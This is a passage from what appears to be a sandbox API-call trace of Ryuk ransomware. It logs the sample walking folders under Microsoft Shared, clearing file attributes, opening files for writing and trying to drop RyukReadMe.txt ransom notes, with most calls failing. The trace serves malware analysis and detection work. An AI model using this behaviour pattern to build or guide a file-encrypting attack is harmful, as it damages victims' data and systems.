dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.269] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.269] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.269] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.269] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.269] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM", dwFileAttributes=0x80) returned 0 [0133.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.270] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.270] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.270] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.270] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.270] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF", dwFileAttributes=0x80) returned 0 [0133.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\STUDIO.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\studio.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.271] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.271] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.271] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.271] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.271] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.271] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.272] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.272] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.272] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.272] SetLastError (dwErrCode=0x0) [0133.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.272] GetLastError () returned 0x5 [0133.272] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.272] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.272] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.272] SetLastError (dwErrCode=0x0) [0133.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.272] GetLastError () returned 0x5 [0133.272] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.272] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.272] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.272] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.272] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.272] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.273] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.273] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.273] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.273] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.273] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.273] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM", dwFileAttributes=0x80) returned 0 [0133.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.274] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.274] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.274] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.274] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF", dwFileAttributes=0x80) returned 0 [0133.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\SUMIPNTG.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\sumipntg.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.274] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.274] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.275] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.275] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.275] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.275] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.275] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.275] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.275] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.275] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.275] SetLastError (dwErrCode=0x0) [0133.275] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.275] GetLastError () returned 0x5 [0133.275] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.275] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.276] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.276] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.276] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF", dwFileAttributes=0x80) returned 0 [0133.276] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\THEMES.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\themes.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.276] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.276] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.277] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.277] SetLastError (dwErrCode=0x0) [0133.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.277] GetLastError () returned 0x5 [0133.277] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.277] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.277] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.277] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.277] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.277] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.277] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.278] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.278] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.278] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.278] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.278] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.278] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.278] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.278] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.278] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.278] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM", dwFileAttributes=0x80) returned 0 [0133.279] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.280] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.280] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.280] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.280] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.280] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF", dwFileAttributes=0x80) returned 0 [0133.281] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.281] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.281] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.281] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.281] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.281] SetLastError (dwErrCode=0x0) [0133.281] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.281] GetLastError () returned 0x5 [0133.281] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.281] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.281] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.281] SetLastError (dwErrCode=0x0) [0133.281] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.281] GetLastError () returned 0x5 [0133.281] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.281] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.281] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.282] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.282] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.282] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.282] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0133.285] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.285] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.285] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.285] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.286] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.286] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG", dwFileAttributes=0x80) returned 0 [0133.286] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.286] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.286] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.287] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.287] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.287] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM", dwFileAttributes=0x80) returned 0 [0133.287] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\watermar.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.287] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.287] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.287] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.287] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.287] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF", dwFileAttributes=0x80) returned 0 [0133.288] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\WATERMAR.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\watermar.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.288] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.288] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.288] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0133.288] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0133.288] SetLastError (dwErrCode=0x0) [0133.288] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.288] GetLastError () returned 0x5 [0133.288] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.289] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.289] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0133.289] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0133.289] SetLastError (dwErrCode=0x0) [0133.289] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.289] GetLastError () returned 0x5 [0133.289] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.289] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.289] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0133.289] SetLastError (dwErrCode=0x0) [0133.289] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.289] GetLastError () returned 0x5 [0133.289] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0133.289] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.289] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0133.290] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.291] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0133.291] SetLastError (dwErrCode=0x0) [0133.291] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.291] GetLastError () returned 0x5 [0133.291] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0133.291] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0133.291] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0133.291] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.291] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0133.292] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0133.292] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS", dwFileAttributes=0x80) returned 0 [0133.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0133.292] CloseHandle 